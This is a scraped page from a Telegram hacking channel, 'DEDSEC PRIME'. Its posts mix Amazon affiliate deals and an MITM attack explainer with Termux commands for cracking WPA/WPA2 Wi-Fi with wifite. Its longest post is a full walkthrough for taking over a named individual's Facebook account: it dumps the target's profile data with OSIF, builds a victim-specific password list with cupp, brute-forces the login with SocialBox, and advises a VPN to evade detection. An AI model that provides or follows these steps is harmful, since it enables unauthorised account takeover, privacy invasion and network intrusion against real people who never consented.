DEDSEC PRIME™


Channel's geo and language: not specified, not specified
Category: not specified


በዚህ ቻናል ውስጥ
📌የሃኪንግ ኮርሶች
📌ሶፍትዌር ትሪኮች
📌የዌብሳይት ጥቆማዎች
📌የ ኮምፒውተር ትምህርቶች እና ሌሎችም ነገሮችን ያገኛሉ።
@DEDSEC_PRIME

Related channels

Channel's geo and language
not specified, not specified
Statistics
Posts filter


All of you plz join this channel




Hi


Hello




Basics for termux users




🌟Best Suggestion From Amazon Great indian Sale | #Amazon #Bestpick

1) Asus VivoBook 15 Laptop - worth Rs.24,999 for Rs.19,990
https://amzn.to/33YsiDi
2) HP Pavilion Gaming DK0268TX Laptop - worth Rs.74,929 for Rs.62,990
https://amzn.to/3drwxdH
3) Mi Band 5 - worth Rs.2,498
https://amzn.to/316yqaN
4) Amazfit Verge Smartwatch - worth Rs.13,999 for Rs.7,999 https://amzn.to/3iZWfav
5) LG QHD (2560 x 1440) 32 Inch IPS Monitor - worth Rs.36,700 for Rs.25 499
https://amzn.to/378E9ki
6) Brother HL-B2000D Mono Laser Printer - worth Rs.13,590 for Rs.8,999
https://amzn.to/3lMKZjj
7) Seagate Expansion Portable 1.5TB External Hard Drive - worth Rs.5,899 for Rs.4,299
https://amzn.to/34Xa3xj
8) Samsung Galaxy Tab A7 Tablet - worth Rs.20,999 for Rs.16,999
https://amzn.to/2IvS35I
9) Sony WF-1000XM3 TWS with ANC - worth Rs.19,990 for Rs.14,990
https://amzn.to/3151TC4
10) Boat AAVANTE Bar 1800 Soundbar - worth Rs.19,990 for Rs.8,999
https://amzn.to/3k62Am8
11) Alienware Stereo Gaming Headset 310H - worth Rs.7,999 for Rs.5,999
https://amzn.to/36UHDXs
12) Canon EOS 1500D DSLR - worth Rs.30,994 for Rs.23,990
https://amzn.to/317OmJS
13) GoPro Hero 8 Black - worth Rs.36,999 for Rs.30,160
https://amzn.to/3kc2fxW
14) Tp-Link Smart Cam Pan Tilt Home WiFi Camera - worth Rs.3,299 for Rs.2,099
https://amzn.to/31aPJYm
15) Infinity (JBL) Glide 120 Wireless Flex Neckband Earphones - worth Rs.2,999 for Rs.899
https://amzn.to/3nQMu1U




🗃 Types Of Man-In-The-Middle Attacks 🗳
━━━━━━━━━━━━━
There are 7 types of MITM attacks.
Cybercriminals can use MITM attacks to gain control of devices in a variety of ways.


1⃣ IP spoofing
Every device capable of connecting to the internet has an internet protocol (IP) address, which is similar to the street address for your home. By spoofing an IP address, an attacker can trick you into thinking you’re interacting with a website or someone you’re not, perhaps giving the attacker access to information you’d otherwise not share.

2⃣ DNS spoofing
Domain Name Server, or DNS, spoofing is a technique that forces a user to a fake website rather than the real one the user intends to visit. If you are a victim of DNS spoofing, you may think you’re visiting a safe, trusted website when you’re actually interacting with a fraudster. The perpetrator’s goal is to divert traffic from the real site or capture user login credentials.

3⃣ HTTPS spoofing
When doing business on the internet, seeing “HTTPS” in the URL, rather than “HTTP” is a sign that the website is secure and can be trusted. In fact, the “S” stands for “secure.” An attacker can fool your browser into believing it’s visiting a trusted website when it’s not. By redirecting your browser to an unsecure website, the attacker can monitor your interactions with that website and possibly steal personal information you’re sharing.

4⃣ SSL hijacking
When your device connects to an unsecure server — indicated by “HTTP” — the server can often automatically redirect you to the secure version of the server, indicated by “HTTPS.” A connection to a secure server means standard security protocols are in place, protecting the data you share with that server. SSL stands for Secure Sockets Layer, a protocol that establishes encrypted links between your browser and the web server.

In an SSL hijacking, the attacker uses another computer and secure server and intercepts all the information passing between the server and the user’s computer.

5⃣
Email hijacking
Cybercriminals sometimes target email accounts of banks and other financial institutions. Once they gain access, they can monitor transactions between the institution and its customers. The attackers can then spoof the bank’s email address and send their own instructions to customers. This convinces the customer to follow the attackers’ instructions rather than the bank’s. As a result, an unwitting customer may end up putting money in the attackers’ hands.

6⃣ Wi-Fi eavesdropping
Cybercriminals can set up Wi-Fi connections with very legitimate sounding names, similar to a nearby business. Once a user connects to the fraudster’s Wi-Fi, the attacker will be able to monitor the user’s online activity and be able to intercept login credentials, payment card information, and more. This is just one of several risks associated with using public Wi-Fi. You can learn more about such risks here.

7⃣ Stealing browser cookies
To understand the risk of stolen browser cookies, you need to understand what one is. A browser cookie is a small piece of information a website stores on your computer.

For example, an online retailer might store the personal information you enter and shopping cart items you’ve selected on a cookie so you don’t have to re-enter that information when you return.

A cybercriminal can hijack these browser cookies. Since cookies store information from your browsing session, attackers can gain access to your passwords, address, and other sensitive informa
tion.




#Tool #WiFi
How to Hack Wifi WPA,WPA2,WPA2 PSK in Tremux Wi-Fi All Hacking Tool Install
[Type the Command 👇 Tab to Copy]

$ apt update && apt upgrade -y

$ apt install git

$ apt install python2

$ git clone https://github.com/derv82/wifite.git

$ ls

$ cd wifite

$ python2 wifite.py [open first page]

$ git clone https://github.com/derv82/wifite2

$ ls

$ cd wifite2

$ ls

$ python2 Wifite.py




#Game
Top 10 Game Open & Play Tremux App
Install GameTool - Open Tremux and Type the Command 👇

$ apt update && apt upgrade

$ apt install python

$ git clone https://github.com/mbest99/gametool

$ ls

$ cd gametool

$ ls

$ bash cok.sh




❤️HOW TO HACK A FACEBOOK ACCOUNT ❤️

Requirements:
- Termux
- 200 MB space
- Facebook target link
- Info about target
- Root

Setup:
$ apt install nodejs -y

$ pkg install git tsu -y

$ apt install python python2 -y

$ apt update; apt upgrade -y

$ npm install --global facebook-id-of

1️⃣ Getting ID

The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.

On the target profile, we can see URL like this:
https://www.facebook.com/michael.schmidt.7965692 — Remove the hyperlink and copy online name after facebook.com/.

$ facebook-id-of michael.schmidt.7965692

› Facebook ID of michael.schmidt.7965692 is 671393100

2️⃣ Dumping Information About Target

For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.

$ pkg update upgrade

$ pkg install git python2

$ git clone https://github.com/ciku370/OSIF

$ cd OSIF

$ pip2 install -r requirements.txt

For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. (TARGET MUST EXIST IN FRIEND LIST)

$ python2 osif.py
D3b2y >> token
Type username (email) & Password.

D3b2y >> cat_token
[*]Your access token !!

Setup done now Hype

D3b2y >> dump_id
D3b3y >> dump_671393100

This fetching some informations about our target an example can be found here:

https://pastebin.com/10H7C22T

If you know your targets e-mail, it's much easier to attack them from the »bruteforce« tool.

D3b3y » dump_mail

Now on to creating a wordlist for bruteforcing

While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.

$ git clone https://github.com/Mebus/cupp.git; cd cupp/

$ python3 cupp.py -i

After tool has been started, fill out the information which you have dumped with OSIF.
It's asking :
> Do you want to add some key words about the victim? Y/[N]: y

> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson

> Do you want to add special chars at the end of words? Y/[N]: n

> Do you want to add some random numbers at the end of words? Y/[N]:y

> Leet mode? (i.e. leet = 1337) Y/[N]: y

$ cp -R test.txt $HOME

Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.
These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.

It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.

Bruteforcing the account

$ pkg install nano -y

$ git clone https://github.com/TunisianEagles/SocialBox.git; cd SocialBox; chmod +x *.sh

$ nano install-sb.sh

Edit all sudo lines, only remove sudo:
sudo apt-get update
After:
apt update

Exit — ctrl+x — y (yes) — enter.

$ ./install-sb.sh

$ cp -R $HOME/test.txt $PWD

$ ./SocialBox.sh

CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :

Choice > 1
Enter Facebook ID / Email / Username / Number: 671393100
Enter wordlist path : $HOME/cupp/test.txt

Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!




Antivirus and Ultrafast Cloud Security Software!
#Baidu_Antivirus

❇️Baidu Antivirus
is fully free antivirus protection software that utilizes all the advances of modern cloud computation to deliver rock-solid protection to all users. This entails protection against foreign threats, interception of harmful software packages, and constant protection of your local OS and data. To achieve maximum level of protection, It utilizes not one, but three antivirus engines. These engines (Baidu Antivirus Engine, Baidu Cloud Engine and fully integrated antivirus engine from Avira) work together in cooperation, offering you complete virus detection and removal that will make your PC safe haven against any kind of malicious software threats. Download Baidu Antivirus Latest Version for Windows!




Social Engineering Toolkit - Kali Linux - Simple Tutorial

🌀How to install 🌀

$ git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/

$ cd setoolkit

$ pip3 install -r requirements.txt

$ python setup.py

Full Details :- https://www.trustedsec.com

20 last posts shown.

29

subscribers
Channel statistics